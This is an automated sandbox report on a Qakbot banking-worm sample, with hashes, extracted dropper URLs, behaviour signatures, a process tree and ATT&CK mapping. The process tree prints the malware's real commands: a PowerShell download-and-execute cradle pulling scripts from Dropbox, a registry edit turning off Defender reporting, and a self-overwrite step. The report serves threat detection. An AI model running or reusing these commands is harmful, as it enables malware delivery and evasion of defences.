Analysis

  • max time kernel: 144s
  • max time network: 107s
  • platform: windows10-2004_x64
  • resource: win10v2004-20240426-en
  • resource tags: arch:x64, arch:x86, image:win10v2004-20240426-en, locale:en-us, os:windows10-2004-x64, system
  • submitted: 08-05-2024 02:19

General

  • Target: b7a00ad06ccceff1cf5fe5c7fed8e0d43b456662721ec668f91681196a1cb3ba.exe
  • Size: 536KB
  • MD5: 4d9add7f38d2bfcfbc3d4bcf3f44e47d
  • SHA1: c9198de89705f6983a50c445ed1866a24cc9c846
  • SHA256: b7a00ad06ccceff1cf5fe5c7fed8e0d43b456662721ec668f91681196a1cb3ba
  • SHA512: 06e86fdfd21bfc8b91f1489bda9e17e27e5bc6855a4f91753353d4d8fbcb645ccef8b70e92eb2e5ed7edad55e87fe75e7a597310e464354313d01a8a6a068d32
  • SSDEEP: 6144:K3puL8eujbUcqbRI30RYAimlQY1KdZwzlW+2M0WybVGH/Itkug/i03s/nZYIVQV2:R8eSbcRYAplQYU3YlWOdT/pbqUVxg

Malware Config

Extracted (language: ps1, deobfuscated)

  URLs:
  • ps1.dropper: https://www.dropbox.com/s/41zf98knyy5atko/001_01.ps1?dl=1
  • ps1.dropper: https://www.dropbox.com/s/dh8flnrogfq1h1w/001.ps1?dl=1

Extracted

  • Family: qakbot
  • Version: 322.358
  • Campaign: 1524770894

Credentials
C2

Signatures

  • Qakbot/Qbot

    Qbot or Qakbot is a sophisticated worm with banking capabilities.

  • Blocklisted process makes network request 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up the country code configured in the registry, likely for geofencing.

  • Executes dropped EXE 2 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Uses the powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks SCSI registry key(s) 3 TTPs 12 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Modifies registry class 64 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\sihost.exe
    sihost.exe
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    PID:2816
  • C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    PID:3160
  • C:\Windows\system32\taskhostw.exe
    taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    PID:3224
  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of UnmapMainImage
    PID:3528
    • C:\Users\Admin\AppData\Local\Temp\b7a00ad06ccceff1cf5fe5c7fed8e0d43b456662721ec668f91681196a1cb3ba.exe
      "C:\Users\Admin\AppData\Local\Temp\b7a00ad06ccceff1cf5fe5c7fed8e0d43b456662721ec668f91681196a1cb3ba.exe"
      2⤵
      • Checks computer location settings
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:3028
      • C:\Users\Admin\AppData\Local\Temp\b7a00ad06ccceff1cf5fe5c7fed8e0d43b456662721ec668f91681196a1cb3ba.exe
        "C:\Users\Admin\AppData\Local\Temp\b7a00ad06ccceff1cf5fe5c7fed8e0d43b456662721ec668f91681196a1cb3ba.exe" /C
        3⤵
        • Checks SCSI registry key(s)
        • Suspicious behavior: EnumeratesProcesses
        PID:2096
      • C:\Users\Admin\AppData\Roaming\Microsoft\Zmedxm\zmedx.exe
        C:\Users\Admin\AppData\Roaming\Microsoft\Zmedxm\zmedx.exe
        3⤵
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of WriteProcessMemory
        PID:4848
        • C:\Users\Admin\AppData\Roaming\Microsoft\Zmedxm\zmedx.exe
          "C:\Users\Admin\AppData\Roaming\Microsoft\Zmedxm\zmedx.exe" /C
          4⤵
          • Executes dropped EXE
          • Checks SCSI registry key(s)
          • Suspicious behavior: EnumeratesProcesses
          PID:4044
        • C:\Windows\SysWOW64\explorer.exe
          C:\Windows\SysWOW64\explorer.exe
          4⤵
          • Adds Run key to start application
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:4248
      • C:\Windows\system32\reg.exe
        C:\Windows\system32\reg.exe ADD "HKLM\SOFTWARE\Microsoft\Microsoft AntiMalware\SpyNet" /f /t REG_DWORD /v "SpyNetReporting" /d "0"
        3⤵
        PID:4392
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://www.dropbox.com/s/41zf98knyy5atko/001_01.ps1?dl=1'); IEX (New-Object Net.WebClient).DownloadString('https://www.dropbox.com/s/dh8flnrogfq1h1w/001.ps1?dl=1'); Invoke-MainWorker -Command 'C:\Users\Admin\AppData\Local\Temp\ieivwcfsfngbnnpyywldidctj.txt'"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:5100
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c ping.exe -n 6 127.0.0.1 & type "C:\Windows\System32\calc.exe" > "C:\Users\Admin\AppData\Local\Temp\b7a00ad06ccceff1cf5fe5c7fed8e0d43b456662721ec668f91681196a1cb3ba.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:980
        • C:\Windows\SysWOW64\PING.EXE
          ping.exe -n 6 127.0.0.1
          4⤵
          • Runs ping.exe
          PID:3352
  • C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    PID:3696
  • C:\Windows\system32\DllHost.exe
    C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
    1⤵
    PID:3884
  • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
    "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    PID:3988
  • C:\Windows\System32\RuntimeBroker.exe
    C:\Windows\System32\RuntimeBroker.exe -Embedding
    1⤵
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:4056
  • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
    "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
    1⤵
    PID:3808
  • C:\Windows\System32\RuntimeBroker.exe
    C:\Windows\System32\RuntimeBroker.exe -Embedding
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    PID:4180
  • C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe
    "C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe" -ServerName:InputApp.AppX9jnwykgrccxc8by3hsrsh07r423xzvav.mca
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    PID:4908
  • C:\Windows\System32\RuntimeBroker.exe
    C:\Windows\System32\RuntimeBroker.exe -Embedding
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    PID:4668
  • C:\Windows\system32\backgroundTaskHost.exe
    "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:CortanaUI.AppX3bn25b6f886wmg6twh46972vprk9tnbf.mca
    1⤵
    PID:2556
  • C:\Windows\System32\RuntimeBroker.exe
    C:\Windows\System32\RuntimeBroker.exe -Embedding
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    PID:2224
  • C:\Windows\System32\RuntimeBroker.exe
    C:\Windows\System32\RuntimeBroker.exe -Embedding
    1⤵
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    PID:2380
  • C:\Windows\system32\backgroundTaskHost.exe
    "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
    1⤵
    PID:1804
  • C:\Windows\system32\backgroundTaskHost.exe
    "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
    1⤵
    PID:2260

MITRE ATT&CK Matrix (ATT&CK v13)

  • Execution
    • Command and Scripting Interpreter (T1059): 1
      • PowerShell (T1059.001): 1
  • Persistence
    • Boot or Logon Autostart Execution (T1547): 1
      • Registry Run Keys / Startup Folder (T1547.001): 1
  • Privilege Escalation
    • Boot or Logon Autostart Execution (T1547): 1
      • Registry Run Keys / Startup Folder (T1547.001): 1
  • Defense Evasion
    • Modify Registry (T1112): 1
  • Discovery
    • Query Registry (T1012): 2
    • System Information Discovery (T1082): 3
    • Peripheral Device Discovery (T1120): 1
    • Remote System Discovery (T1018): 1

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cj13j2sm.g52.ps1
    Filesize: 60B
    MD5: d17fe0a3f47be24a6453e9ef58c94641
    SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
    SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
    SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
  • C:\Users\Admin\AppData\Roaming\Microsoft\Zmedxm\zmed.dat
    Filesize: 91B
    MD5: da685d7dfeb7cabfe12ea2acf71680ac
    SHA1: 9385bc99571a50aacc04ce3877dd5d4d3e8618dc
    SHA256: 22a19b3a7372fb0c419cbde0a4d54ba1bf79c755764d0f3a681e05a85fb6519b
    SHA512: 5466837584cae9eaf2e801de6a04751c2d7a8d6e1bb8959a30c1ea185bc4cfefcde046b392762a0fcf0fc106c3a6ac60ca98c653e25a10322038001d3969e83b
  • C:\Users\Admin\AppData\Roaming\Microsoft\Zmedxm\zmedx.exe
    Filesize: 536KB
    MD5: 4d9add7f38d2bfcfbc3d4bcf3f44e47d
    SHA1: c9198de89705f6983a50c445ed1866a24cc9c846
    SHA256: b7a00ad06ccceff1cf5fe5c7fed8e0d43b456662721ec668f91681196a1cb3ba
    SHA512: 06e86fdfd21bfc8b91f1489bda9e17e27e5bc6855a4f91753353d4d8fbcb645ccef8b70e92eb2e5ed7edad55e87fe75e7a597310e464354313d01a8a6a068d32
  • C:\Users\Admin\AppData\Roaming\Microsoft\Zmedxm\zmedx32.dll
    Filesize: 357B
    MD5: 80b73f86b54755770057a89cea37f612
    SHA1: 1c524fa8981ae9b4c9d456f2438956d12f9e3aee
    SHA256: 19bdee2a3950279d9f30fb5a8334ec0302b83101e668c6d743edc3b3b27c7db9
    SHA512: 5142124831c161ca6171528c51c52bdb6215fd8c04a2d5db406dc2715d48e9817cbf9e1b4ff73e21e6d5630e1ce2c3cfd1f3246360b15d977f88337a1be3a1b7